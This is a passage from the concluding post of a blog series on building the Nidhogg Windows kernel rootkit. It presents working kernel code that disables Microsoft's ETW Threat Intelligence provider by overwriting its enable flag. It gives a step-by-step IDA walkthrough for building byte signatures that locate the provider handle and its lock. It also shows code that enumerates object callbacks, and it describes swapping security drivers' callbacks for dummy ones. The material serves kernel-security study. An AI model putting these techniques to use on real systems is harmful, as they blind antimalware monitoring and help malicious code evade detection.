	if (enableProviderInfoOffset == (ULONG)STATUS_UNSUCCESSFUL)
		return STATUS_UNSUCCESSFUL;

	PTRACE_ENABLE_INFO enableProviderInfo = (PTRACE_ENABLE_INFO)(etwThreatIntProvRegHandle + EtwGuidEntryOffset + enableProviderInfoOffset);
	ULONG lockOffset = GetEtwGuidLockOffset();

	if (lockOffset != (ULONG)STATUS_UNSUCCESSFUL) {
		etwThreatIntLock = (EX_PUSH_LOCK)(etwThreatIntProvRegHandle + EtwGuidEntryOffset + lockOffset);
		ExAcquirePushLockExclusiveEx(&etwThreatIntLock, 0);
	}

	if (enable) {
		status = MmCopyVirtualMemory(PsGetCurrentProcess(), &this->PrevEtwTiValue, PsGetCurrentProcess(), &enableProviderInfo->IsEnabled, sizeof(ULONG), KernelMode, &bytesWritten);

		if (NT_SUCCESS(status))
			this->PrevEtwTiValue = 0;
	}
	else {
		ULONG disableEtw = 0;
		status = NidhoggMemoryUtils->KeReadProcessMemory(PsGetCurrentProcess(), &enableProviderInfo->IsEnabled, &this->PrevEtwTiValue, sizeof(ULONG), KernelMode);

		if (NT_SUCCESS(status))
			status = MmCopyVirtualMemory(PsGetCurrentProcess(), &disableEtw, PsGetCurrentProcess(), &enableProviderInfo->IsEnabled, sizeof(ULONG), KernelMode, &bytesWritten);
	}

	if (etwThreatIntLock)
		ExReleasePushLockExclusiveEx(&etwThreatIntLock, 0);

	return status;
}

ETW-TI is an ETW provider created by Microsoft to provide insight into specific operations that happen on the system by monitoring specific syscalls. Microsoft created the provider because, back in the day, both antimalware and malware abused the ability to filter syscalls (via SSDT hooking and other methods) to monitor syscall execution. To allow monitoring of important syscalls with lower risk to the user, Microsoft created an ETW provider that an authorized antimalware vendor can use (the vendor needs to get a proper signature from Microsoft to register to that provider).

To disable it, first the addresses of the ETW-TI provider and its lock are found via a signature (more on that in the next section), then the lock is acquired to ensure safe modification of the provider, and lastly the value is changed via MmCopyVirtualMemory. As you can see, there is no need to attach to a specific process or change any page permissions, which makes it easier to modify the target memory but also more prone to developer mistakes.

Signature Making Process

In this section, I will use the previous example of disabling ETW-TI to show the process of finding and creating a signature via IDA Free (it doesn't matter which SRE (software reverse engineering) tool is used, use whatever you feel more comfortable with :) ). To create the best signature, it is preferable to check against several Windows versions, but for the sake of the explanation I will document the process for Windows 11 22H2.

The first thing to do is to find the ETW-TI handle in the first place. To do so, it is best to look at the function that initializes all ETW providers: EtwpInitialize. After a quick look, the handle is found:

; ...
lea     r9, EtwThreatIntProvRegHandle
xor     r8d, r8d
xor     edx, edx
lea     rcx, ThreatIntProviderGuid
call    EtwRegister
; ...

Now that we know that EtwThreatIntProvRegHandle is the target handle, we can look at the xrefs to it and see whether any exported function uses it. From searching the xrefs, the only exported function that uses it (in the searched version) is KeInsertQueueApc. The reason for searching for an exported function is to find the target object with as few signatures as possible.

; ...
push    r14
push    r15
sub     rsp, 60h
mov     r12, r8
mov     r13, rdx
mov     rsi, rcx
xor     edx, edx
mov     rcx, cs:EtwThreatIntProvRegHandle
mov     r8d, 3000h
call    EtwProviderEnabled
; ...

Now, we can create a signature using the mov rcx, cs:EtwThreatIntProvRegHandle instruction (if the opcode bytes of the target aren't their first occurrence in the function, the signature is built from a couple of instructions, e.g. xor edx, edx; mov rcx, cs:EtwThreatIntProvRegHandle). To see the bytes conveniently in IDA, we can change the number of bytes shown next to each instruction by navigating to Options → General and changing Number of opcode bytes (graph) from 0 to 8.

; ...
41 56                   push    r14
41 57                   push    r15
48 83 EC 60             sub     rsp, 60h
4D 8B E0                mov     r12, r8
4C 8B EA                mov     r13, rdx
48 8B F1                mov     rsi, rcx
33 D2                   xor     edx, edx
48 8B 0D 8D 18 91 00    mov     rcx, cs:EtwThreatIntProvRegHandle
41 B8 00 30 00 00       mov     r8d, 3000h
E8 2A 04 00 00          call    EtwProviderEnabled
; ...

Since we can see that 48 8B repeats itself above, we can use the D2 that precedes it to create the signature D2 48 8B, and know that the handle will be at baseAddress + foundIndex + offset (usually this is the calculation, but it might shift a little depending on the instructions), where offset is 3 in this case, foundIndex is the index at which the signature was found in the function and baseAddress is the address of the function (in this case, KeInsertQueueApc).
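
The search itself can be tried out on the bytes from the listing above, copied into a plain buffer. The sketch below is a generic wildcard byte search plus a RIP-relative resolve; FindSignature and ResolveRipRelative are hypothetical helpers and do not reproduce the signature or behavior of the FindPattern function used by the driver. The base address 0x1000 used to exercise it is an arbitrary assumption.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns the index of the first match of pattern inside data, or -1.
// Pattern bytes equal to wildcard match any data byte.
inline std::ptrdiff_t FindSignature(const std::uint8_t* data, std::size_t dataLen,
                                    const std::uint8_t* pattern, std::size_t patternLen,
                                    std::uint8_t wildcard) {
    if (patternLen == 0 || patternLen > dataLen) return -1;
    for (std::size_t i = 0; i + patternLen <= dataLen; i++) {
        std::size_t j = 0;
        while (j < patternLen && (pattern[j] == wildcard || pattern[j] == data[i + j])) j++;
        if (j == patternLen) return static_cast<std::ptrdiff_t>(i);
    }
    return -1;
}

// Resolves a RIP-relative operand: target = address of the next instruction + disp32.
// dispIndex is where the 4-byte displacement starts inside code, and codeAddress
// is the address code[0] would have at run time. Assumes the displacement is the
// last field of the instruction and that the host is little-endian.
inline std::uint64_t ResolveRipRelative(const std::uint8_t* code, std::size_t dispIndex,
                                        std::uint64_t codeAddress) {
    std::int32_t disp;
    std::memcpy(&disp, code + dispIndex, sizeof(disp));
    return codeAddress + dispIndex + sizeof(disp) + static_cast<std::int64_t>(disp);
}
```

In this sketch the match index points at the D2 byte, so the displacement starts four bytes later (after D2 48 8B 0D); the exact constant depends on where a given search helper reports the match, which is why it can differ from the offset quoted above.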

Now, all that is left to do is to repeat the process for the lock as well and assign a proper variable with the right type.

Patching Kernel Callbacks

Another example of modifying kernel mode memory is patching kernel callbacks. The kernel callbacks are stored in different linked lists, one for each callback type. To find a list, we usually need to go through the process of creating a signature and binary searching for the object (NOTE: when searching, it is super important to make sure the searched address is valid and not inside a discardable page, or it might cause a BSOD). However, I want to show the different case of object callbacks (if you want, you can refresh your memory on object callbacks here).

NTSTATUS ListObCallbacks(ObCallbacksList* Callbacks) {
	NTSTATUS status = STATUS_SUCCESS;
	PFULL_OBJECT_TYPE objectType = NULL;
	CHAR driverName[MAX_DRIVER_PATH] = { 0 };
	errno_t err = 0;
	ULONG index = 0;

	switch (Callbacks->Type) {
	case ObProcessType:
		objectType = (PFULL_OBJECT_TYPE)*PsProcessType;
		break;
	case ObThreadType:
		objectType = (PFULL_OBJECT_TYPE)*PsThreadType;
		break;
	default:
		status = STATUS_INVALID_PARAMETER;
		break;
	}

	if (!NT_SUCCESS(status))
		return status;

	ExAcquirePushLockExclusive((PULONG_PTR)&objectType->TypeLock);
	POB_CALLBACK_ENTRY currentObjectCallback = (POB_CALLBACK_ENTRY)(&objectType->CallbackList);

	if (Callbacks->NumberOfCallbacks == 0) {
		do {
			if (currentObjectCallback->Enabled) {
				if (currentObjectCallback->PostOperation || currentObjectCallback->PreOperation)
					Callbacks->NumberOfCallbacks++;
			}
			currentObjectCallback = (POB_CALLBACK_ENTRY)currentObjectCallback->CallbackList.Flink;
		} while ((PVOID)currentObjectCallback != (PVOID)(&objectType->CallbackList));
	}
	else {
		do {
			if (currentObjectCallback->Enabled) {
				if (currentObjectCallback->PostOperation) {
					if (NT_SUCCESS(MatchCallback(currentObjectCallback->PostOperation, driverName))) {
						err = strcpy_s(Callbacks->Callbacks[index].DriverName, driverName);

						if (err != 0) {
							status = STATUS_ABANDONED;
							break;
						}
					}

					Callbacks->Callbacks[index].PostOperation = currentObjectCallback->PostOperation;
				}
				if (currentObjectCallback->PreOperation) {
					if (NT_SUCCESS(MatchCallback(currentObjectCallback->PreOperation, driverName))) {
						err = strcpy_s(Callbacks->Callbacks[index].DriverName, driverName);

						if (err != 0) {
							status = STATUS_ABANDONED;
							break;
						}
					}

					Callbacks->Callbacks[index].PreOperation = currentObjectCallback->PreOperation;
				}
				index++;
			}
			currentObjectCallback = (POB_CALLBACK_ENTRY)currentObjectCallback->CallbackList.Flink;
		} while (index != Callbacks->NumberOfCallbacks && (PVOID)currentObjectCallback != (PVOID)(&objectType->CallbackList));
	}
	ExReleasePushLockExclusive((PULONG_PTR)&objectType->TypeLock);
	return status;
}

In this function, there is no binary searching and no signature; instead, the exported Ps*Type is used to enumerate the callbacks. The reason is that object callbacks are not kept in an internal list; they are saved in a list inside the corresponding object type itself, in a field called CallbackList. Conveniently, the TypeLock can be acquired from the object type as well.

From there, it is a matter of acquiring the lock, iterating the list and finding the wanted callback by checking whether it matches the user provided callback (the function shown here also lists the callbacks and finds the corresponding driver name by checking which driver's address range contains the callback). If it matches, the callback is replaced with a dummy callback that does nothing (or the original one is restored, depending on the user input).
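
ListObCallbacks follows a count-then-fill convention: a first call with NumberOfCallbacks set to 0 only counts, and a second call fills a buffer of that size. The user-mode sketch below models that convention on a synthetic circular list. All types and names are hypothetical simplifications, locking is omitted, and unlike the function above this sketch starts at head->Flink so that the list head is never read as an entry.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

struct Link { Link* Flink; Link* Blink; };

// Simplified callback entry; the link is the first member, so a Link* that
// points at an entry can be cast back to the entry itself.
struct FakeCallbackEntry {
    Link CallbackList;
    bool Enabled;
    void* PreOperation;
    void* PostOperation;
};

struct CallbackInfo { void* PreOperation; void* PostOperation; };

// Appends an entry at the end of a circular list that uses head as sentinel.
inline void InsertTail(Link* head, Link* entry) {
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

// Call with out == nullptr to get the count, then again with a buffer.
// Returns the number of enabled entries that have at least one routine.
inline std::size_t ListCallbacks(Link* head, CallbackInfo* out, std::size_t capacity) {
    std::size_t count = 0;
    for (Link* link = head->Flink; link != head; link = link->Flink) {
        auto* entry = reinterpret_cast<FakeCallbackEntry*>(link);
        if (!entry->Enabled || (!entry->PreOperation && !entry->PostOperation))
            continue;
        if (out) {
            if (count == capacity) break;  // never write past the caller's buffer
            out[count] = {entry->PreOperation, entry->PostOperation};
        }
        count++;
    }
    return count;
}
```

Using the same filter in both passes keeps the count and the filled entries consistent, as long as the list does not change between the two calls.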

The End?

I have thought for a long time about when and how to end this series. From a small “hello world” driver to one of the most feature-rich drivers, with support for all Windows versions since the first release of Windows 10 - this was definitely quite a journey, and of course I cannot forget about this blog series as well.

I can’t thank enough all the people who helped proofread the posts and gave advice and points for improvement. With the hours upon hours of debugging, reversing and coding for this series and Nidhogg - it was a hell of a ride.

While I’m writing this in the past tense, this is far from being the reality. In the last couple of months I have been working on amazing projects; some will be released in the following months and some might take a little longer than that (and there will also be some minor improvements, fixes and features for Nidhogg as well!).

I’m glad to see that several people have been motivated by Nidhogg and Lord Of The Ring0 (some told me so by reaching out directly - which I encourage you to do!) to create their own rootkit and get into this marvelous world of Windows kernel development.

To answer this section’s question - while this is the end of Lord Of The Ring0 and there won’t be any major updates to Nidhogg in the foreseeable future, this is definitely not the end of the kernel development journey but merely the start of it. So expect new blog posts, new projects and some novel research, because now is when it is really going to begin. It is finally time to level up.

Lord Of The Ring0 - Part 6 | Conclusion